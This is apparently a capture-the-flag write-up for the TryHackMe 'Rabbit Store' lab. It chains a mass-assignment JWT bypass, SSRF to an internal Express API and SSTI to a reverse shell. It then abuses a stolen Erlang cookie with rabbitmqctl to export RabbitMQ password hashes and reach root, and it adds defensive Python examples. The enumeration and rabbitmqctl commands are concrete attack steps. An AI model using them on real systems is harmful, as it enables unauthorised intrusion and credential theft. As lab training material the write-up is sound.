TryHackMe Rabbit Store Walkthrough

TryHackMe Machine Walkthrough

Another Linux lab machine from TryHackMe. This one is exploited by chaining several weaknesses together to reach remote code execution.

| Field      | Value        |
|------------|--------------|
| Name       | Rabbit Store |
| Level      | Medium       |
| Technology | Linux        |
| Points     | 60           |
| Platform   | TryHackMe    |

So let’s start.

  • First, connect to the VPN or use the AttackBox.
  • Now start the machine.

# Enumeration

  • Let’s start with a full-port nmap scan with default scripts and version detection:

```text
┌──(kali㉿kali)-[~/tryhackme]
└─$ nmap -sC -sV -p- 10.10.108.94 --min-rate=1500
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-05 11:48 EDT
Nmap scan report for cloudsite.thm (10.10.108.94)
Host is up (0.19s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3f:da:55:0b:b3:a9:3b:09:5f:b1:db:53:5e:0b:ef:e2 (ECDSA)
|_  256 b7:d3:2e:a7:08:91:66:6b:30:d2:0c:f7:90:cf:9a:f4 (ED25519)
80/tcp    open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://cloudsite.thm/.
|_http-server-header: Apache/2.4.52 (Ubuntu)
4369/tcp  open  epmd    Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    rabbit: 25672
25672/tcp open  unknown
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
  • There are four Open Ports :
    • 22 (SSH)
    • 80 (HTTP)
    • 4369 (EPMD)
    • 25672 (Erlang Distribution)
  • nmap also shows that port 80 redirects to http://cloudsite.thm/, so we add that hostname for the target IP to /etc/hosts:

```text
┌──(kali㉿kali)-[~/Downloads/tryhackme]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters

10.10.108.94  cloudsite.thm
```

  • Looking at the page source I found another hostname, storage.cloudsite.thm, so I add that to /etc/hosts as well:

```text
┌──(kali㉿kali)-[~/tryhackme]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters

10.10.108.94  cloudsite.thm
10.10.108.94  storage.cloudsite.thm
```

# Creating an Account

  • Visiting that host leads to a login page, and the register function works too.
  • I registered an account with a random email and password.
  • When I tried to log in, the application only returned a message.
  • I then compared both requests (register and login) in Burp.
  • The application issues a JWT to carry the session state. My first thought was to decode the token, and it contains the details of my account.
  • There is also an extra claim in it: "subscription":"inactive".

# Activating the Account

  • So I sent another registration request, intercepted it, and added an extra field to the JSON body: "subscription":"active".
  • The request was accepted and the response said "User registered successfully".
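The activation trick above is a mass-assignment bug: the registration handler copies whatever JSON fields the client sends into the user record, and the JWT claims are later built from that record, so the server signs a token over data the client chose. The following is an added example, not the lab’s code, showing that pattern beside a hardened handler that only accepts an allow-list of fields; the function names and the constructed request bodies are my own.

```python
# Added example (not the Rabbit Store code): the mass-assignment pattern behind the
# "subscription":"active" trick, modelled as plain functions so it runs stand-alone.
import json

DEFAULT_SUBSCRIPTION = "inactive"       # what a fresh account should always start with
ALLOWED_FIELDS = {"email", "password"}  # the only fields /api/register should accept


def register_vulnerable(body_json: str) -> dict:
    """Copies every field of the client JSON into the user record.

    Any client that adds "subscription": "active" overrides the server default
    and activates its own account.
    """
    body = json.loads(body_json)
    user = {"subscription": DEFAULT_SUBSCRIPTION}
    user.update(body)  # bug: client-controlled keys overwrite server-set defaults
    return user


def register_hardened(body_json: str) -> dict:
    """Builds the record only from allow-listed fields. The subscription state is
    set server-side, and unexpected fields are rejected rather than silently
    dropped so that tampering shows up in the logs.
    """
    body = json.loads(body_json)
    unexpected = set(body) - ALLOWED_FIELDS
    if unexpected:
        raise ValueError(f"unexpected fields in registration: {sorted(unexpected)}")
    return {
        "email": body["email"],
        "password": body["password"],  # hash before storing in a real application
        "subscription": DEFAULT_SUBSCRIPTION,
    }


def jwt_claims(user: dict) -> dict:
    """The claims that get signed into the JWT on login. Whatever is in the record
    ends up in the token, so the record must be built from trusted values only;
    the signature does not help when the server signs attacker-chosen data."""
    return {"email": user["email"], "subscription": user["subscription"]}


# Constructed request bodies mirroring the walkthrough's registration requests.
CLEAN_BODY = json.dumps({"email": "test@example.com", "password": "pw"})
TAMPERED_BODY = json.dumps(
    {"email": "test@example.com", "password": "pw", "subscription": "active"}
)
```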

  • After logging in to that account I could reach the resource: it is basically an upload feature for files.
  • Wappalyzer shows the technology stack in use.
  • One catch: the uploaded file name does not show up anywhere. When you access an uploaded file it is downloaded straight away, and files are stored under a random hash value, which is returned to us as the "File Path" after the upload.
  • After struggling a little I thought of fuzzing the API, and found some additional endpoints.

# Discovering the API Endpoints

```text
┌──(kali㉿kali)-[~/tryhackme]
└─$ feroxbuster -u http://storage.cloudsite.thm/api/

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://storage.cloudsite.thm/api/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       10l       15w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
405      GET        1l        4w       36c http://storage.cloudsite.thm/api/register
405      GET        1l        4w       36c http://storage.cloudsite.thm/api/login
401      GET        1l        3w       32c http://storage.cloudsite.thm/api/uploads
403      GET        1l        2w       27c http://storage.cloudsite.thm/api/docs
405      GET        1l        4w       36c http://storage.cloudsite.thm/api/Login
401      GET        1l        3w       32c http://storage.cloudsite.thm/api/Uploads
403      GET        1l        2w       27c http://storage.cloudsite.thm/api/Docs
405      GET        1l        4w       36c http://storage.cloudsite.thm/api/Register
403      GET        1l        2w       27c http://storage.cloudsite.thm/api/DOCS
```
  • Visiting /api/docs directly says access denied.
  • Then I realised my mistake: there is a second upload feature on the same page, and I had forgotten to scroll down.
  • This second feature uploads a file from a URL. I tested it by serving a file from a local python3 HTTP server, and it worked.
  • So I tried to "upload" http://storage.cloudsite.thm/api/docs itself through that URL field.
  • But opening the resulting file still gave access denied.
  • Then I tried the same request with the localhost IP instead of the hostname. That seemed to work, but something was still missing.
  • Opening that file gave "The requested URL was not found on this server".
  • Looking at the responses, I noticed the header x-powered-by: Express, which Wappalyzer had shown too (with some help from online sources).
  • So I made another request adding port 3000, the default port many Express apps listen on, and this time it succeeded: the URL fetch is performed by the server itself, so pointing it at localhost:3000 reaches the internal Express application directly instead of going through Apache on port 80.
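What made the localhost request work is that the upload-by-URL feature fetches the URL from the server, so the server’s own loopback interface (and the Express app on port 3000 behind Apache) is reachable through it. As an added example that is not part of the lab’s code, here is the kind of check such a feature should run before fetching anything; the function names, the injectable resolver and the policy of allowing only ports 80 and 443 are my own assumptions.

```python
# Added example (not the lab's code): validate an "upload from URL" target before
# the server fetches it, refusing loopback/private/link-local destinations such
# as the localhost:3000 address used in this walkthrough.
import ipaddress
import socket
from typing import Callable, List
from urllib.parse import urlsplit

Resolver = Callable[[str], List[str]]  # hostname -> list of IP strings


def default_resolver(host: str) -> List[str]:
    """Resolve every A/AAAA record so that no address is overlooked."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _as_ip(host: str):
    """Return an ip_address object if `host` is a literal IP, else None."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return None


def is_safe_fetch_url(url: str, resolve: Resolver = default_resolver) -> bool:
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False                  # no file://, gopher://, etc.
    if parts.username or parts.password:
        return False                  # http://allowed.host@127.0.0.1/ tricks
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False
    if port not in (80, 443):         # policy choice: public downloads only
        return False
    host = parts.hostname.lower()
    if host == "localhost" or host.endswith(".localhost"):
        return False
    literal = _as_ip(host)
    try:
        addrs = [literal] if literal else [ipaddress.ip_address(a) for a in resolve(host)]
    except (socket.gaierror, ValueError):
        return False
    # is_global is False for loopback, private, link-local, multicast and reserved ranges
    return all(ip.is_global for ip in addrs)
```

The fetch itself must then connect to the address that was checked rather than re-resolving the hostname, otherwise DNS rebinding can change the answer between the check and the request.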

  • That gave access to the hidden endpoints listed in the API docs; the main one was fetch_message_from_chatbot.
  • Trying to access that endpoint with GET says the method is not allowed.
  • A POST request with an empty JSON payload returns the message "username parameter is required".
  • Sending the username parameter as the JSON payload {"username":"admin"} returns a message saying sorry admin, our chatbot server is currently under development.

# SSTI to RCE

  • Since our user-supplied username is reflected in the response, I immediately thought of checking for server-side template injection (SSTI), and the check was successful.
  • Next we can try an SSTI-to-RCE payload; first we check whether it works, and it does.

# Exploitation

  • Now we use the SSTI-to-RCE payload to get code execution.
  • We got a reverse shell back to our listener as the user azrael.
  • To get a stable connection I set up SSH key access for the azrael user and copied the id_rsa to the attack box.
  • Using that id_rsa file I connected over SSH as azrael.
  • Next I started a python3 HTTP server to transfer files to the target.
  • On the target I used wget to download the file for automated enumeration.
  • From there I found an Erlang cookie file containing the cookie value.
  • This confirms the host is running a RabbitMQ messaging server, as the /etc/passwd file also shows.
  • Searching for this messaging server shows that it uses port 4369 (which we saw in the nmap scan), and there are resources on enumerating it.
  • Using the Erlang cookie, we can authenticate and communicate with the RabbitMQ node. Since RabbitMQ nodes are named rabbit@<hostname> by default, we add the target’s hostname (forge) to /etc/hosts (hint taken from an online source).

  • For this we first need to install rabbitmq-server on the attack box:

```bash
sudo apt install rabbitmq-server
```

  • Now we use rabbitmqctl with the cookie to talk to the node and enumerate it:

```bash
sudo rabbitmqctl --erlang-cookie '<cookie-value>' --node rabbit@forge list_users
```

  • Next we export the definitions, which include the password hashes:

```bash
sudo rabbitmqctl --erlang-cookie '<Your_erlang_cookie>' --node rabbit@forge export_definitions /tmp/conf.json
```

  • According to the RabbitMQ documentation the stored value has the format base64(<4 byte salt> + sha256(<4 byte salt> + <password>)).
  • So we run this command to decode it:

```bash
echo -n <entire 49e hash above> | base64 -d | xxd -p -c 100
```

```text
┌──(kali㉿kali)-[~/Downloads/tryhackme]
└─$ echo -n '49e6hSld<REDECTED>EOz9uxhSBHtGU+YBzWF' | base64 -d | xxd -p -c 100
e3d7ba85295d1d16a2617df6f7<Redacted>c43b3f6ec614811ed194f98073585
```
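To make the format concrete, here is an added example (not from the walkthrough) that builds, splits and verifies a RabbitMQ hash in the salted-SHA-256 format quoted above, doing in code what the base64 -d | xxd pipeline and the salt removal in the next step do by hand. The password is made up; only the 4-byte salt e3d7ba85 comes from the post.

```python
# Added example (not from the walkthrough): handle RabbitMQ password hashes in the
# default rabbit_password_hashing_sha256 format the post quotes:
#     base64(<4-byte salt> + sha256(<4-byte salt> + <password>))
import base64
import hashlib
import hmac
import os
from typing import Optional, Tuple

SALT_LEN = 4
DIGEST_LEN = hashlib.sha256().digest_size  # 32 bytes


def make_rabbitmq_hash(password: str, salt: Optional[bytes] = None) -> str:
    """Return the base64 string RabbitMQ would store for `password`."""
    salt = os.urandom(SALT_LEN) if salt is None else salt
    if len(salt) != SALT_LEN:
        raise ValueError("RabbitMQ salts are exactly 4 bytes")
    digest = hashlib.sha256(salt + password.encode("utf-8")).digest()
    return base64.b64encode(salt + digest).decode("ascii")


def split_rabbitmq_hash(stored: str) -> Tuple[str, str]:
    """Decode the base64 value and return (salt_hex, digest_hex): the same as
    `base64 -d | xxd -p` followed by cutting off the first 8 hex characters."""
    raw = base64.b64decode(stored, validate=True)
    if len(raw) != SALT_LEN + DIGEST_LEN:
        raise ValueError("not a salted-SHA-256 RabbitMQ hash")
    return raw[:SALT_LEN].hex(), raw[SALT_LEN:].hex()


def verify_rabbitmq_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    salt_hex, digest_hex = split_rabbitmq_hash(stored)
    recomputed = hashlib.sha256(
        bytes.fromhex(salt_hex) + password.encode("utf-8")
    ).hexdigest()
    return hmac.compare_digest(recomputed, digest_hex)


# Constructed sample: the salt is the one decoded in the walkthrough (e3d7ba85);
# the password is made up, the lab's real password is not known here.
SAMPLE_SALT = bytes.fromhex("e3d7ba85")
SAMPLE_HASH = make_rabbitmq_hash("guest-password", SAMPLE_SALT)
```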

# Root Access

  • Now we strip the 4-byte salt (e3d7ba85) from the beginning, which leaves the actual hash: 295d1d16a2617df6f7614811ed194f98073585
  • That hash value works as the root password, so we can switch to the root user with it:

```text
azrael@forge:~/.ssh$ su - root
su - root
Password: 295d1d16a<Redacted>>4811ed194f98073585

whoami
root
/root
-bash: line 3: /root: Is a directory
cat /root/root.txt
eabf7a0b05d3f2028<redacted>
```

# Final Thoughts

I hope this blog continues to be helpful in your learning journey! If you find it helpful, I’d love to hear your thoughts — my inbox is always open for feedback. Please excuse any typos, and feel free to point them out so I can correct them. Thanks for understanding and happy learning! You can contact me on LinkedIn and Twitter.

This post is licensed under CC BY 4.0 by the author.